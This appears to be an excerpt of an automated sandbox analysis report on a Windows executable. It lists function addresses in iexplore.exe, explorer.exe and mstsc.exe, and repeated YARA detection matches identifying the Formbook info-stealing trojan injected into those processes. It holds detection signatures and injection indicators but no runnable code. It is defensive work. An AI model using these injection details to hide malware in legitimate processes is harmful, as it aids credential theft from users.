          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D69621_2_036D6962
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C99501_2_036C9950
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB9501_2_036DB950
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C29A01_2_036C29A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0378A9A61_2_0378A9A6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C28401_2_036C2840
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CA8401_2_036CA840
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372D8001_2_0372D800
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C38E01_2_036C38E0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EE8F01_2_036EE8F0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036A68B81_2_036A68B8
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03734F401_2_03734F40
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03702F281_2_03702F28
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E0F301_2_036E0F30
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377FF091_2_0377FF09
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B2FC81_2_036B2FC8
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03683FD21_2_03683FD2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03683FD51_2_03683FD5
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377FFB11_2_0377FFB1
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373EFA01_2_0373EFA0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1F921_2_036C1F92
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0E591_2_036C0E59
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377EE261_2_0377EE26
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377EEDB1_2_0377EEDB
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C9EB01_2_036C9EB0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377CE931_2_0377CE93
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D2E901_2_036D2E90
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03777D731_2_03777D73
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C3D401_2_036C3D40
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03771D5A1_2_03771D5A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CAD001_2_036CAD00
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BADE01_2_036BADE0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DFDC01_2_036DFDC0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D8DBF1_2_036D8DBF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03739C321_2_03739C32
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0C001_2_036C0C00
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377FCF21_2_0377FCF2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B0CF21_2_036B0CF2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03760CB51_2_03760CB5
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90C2325_2_0E90C232
          Source: C:\Windows\explorer.exeCode function: 5_2_0E906B305_2_0E906B30
          Source: C:\Windows\explorer.exeCode function: 5_2_0E906B325_2_0E906B32
          Source: C:\Windows\explorer.exeCode function: 5_2_0E9020825_2_0E902082
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90B0365_2_0E90B036
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90F5CD5_2_0E90F5CD
          Source: C:\Windows\explorer.exeCode function: 5_2_0E9099125_2_0E909912
          Source: C:\Windows\explorer.exeCode function: 5_2_0E903D025_2_0E903D02
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAE2325_2_0FAAE232
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAB15CD5_2_0FAB15CD
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAA8B325_2_0FAA8B32
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAA8B305_2_0FAA8B30
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAA5D025_2_0FAA5D02
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAB9125_2_0FAAB912
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAA40825_2_0FAA4082
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAD0365_2_0FAAD036
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003B10A06_2_003B10A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003360E06_2_003360E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0038E2506_2_0038E250
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003614286_2_00361428
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0035C6506_2_0035C650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0038B8B66_2_0038B8B6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003B18E06_2_003B18E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00342AA76_2_00342AA7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00330AC36_2_00330AC3
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00356D106_2_00356D10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00417F3A6_2_00417F3A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00328FC16_2_00328FC1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051905356_2_05190535
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052475716_2_05247571
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0522D5B06_2_0522D5B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052505916_2_05250591
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0524F43F6_2_0524F43F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052424466_2_05242446
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051814606_2_05181460
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0523E4F66_2_0523E4F6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051B47506_2_051B4750
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051907706_2_05190770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0524F7B06_2_0524F7B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0518C7C06_2_0518C7C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052416CC6_2_052416CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051AC6E06_2_051AC6E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051801006_2_05180100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0522A1186_2_0522A118
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0525B16B6_2_0525B16B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0517F1726_2_0517F172
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C516C6_2_051C516C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052181586_2_05218158
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052501AA6_2_052501AA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0519B1B06_2_0519B1B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052481CC6_2_052481CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0524F0E06_2_0524F0E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052470E96_2_052470E9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051970C06_2_051970C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0523F0CC6_2_0523F0CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0524132D6_2_0524132D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0517D34C6_2_0517D34C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0524A3526_2_0524A352
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051D739A6_2_051D739A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052503E66_2_052503E6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0519E3F06_2_0519E3F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052302746_2_05230274
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0032AE27 appears 37 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0517B970 appears 99 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00413E7C appears 202 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 051D7E54 appears 40 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0037E06D appears 31 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00328010 appears 1004 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0520F290 appears 41 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 051FEA12 appears 51 times
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 0372EA12 appears 86 times
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 0373F290 appears 103 times
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 03707E54 appears 93 times
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 036F5130 appears 36 times
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 036AB970 appears 250 times
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7532 -s 1080
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: invalid certificate
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: No import functions for PE file found
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903726120.0000021CCE5E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000000.1702261701.0000021CCE102000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000000.1702261701.0000021CCE102000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIzemuxaqiqawivuloD vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904035530.0000021CCFE70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAhijeyotexewobusiz0 vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeBinary or memory string: OriginalFilenameNativeMethods.dll" vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeBinary or memory string: OriginalFilenameIzemuxaqiqawivuloD vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
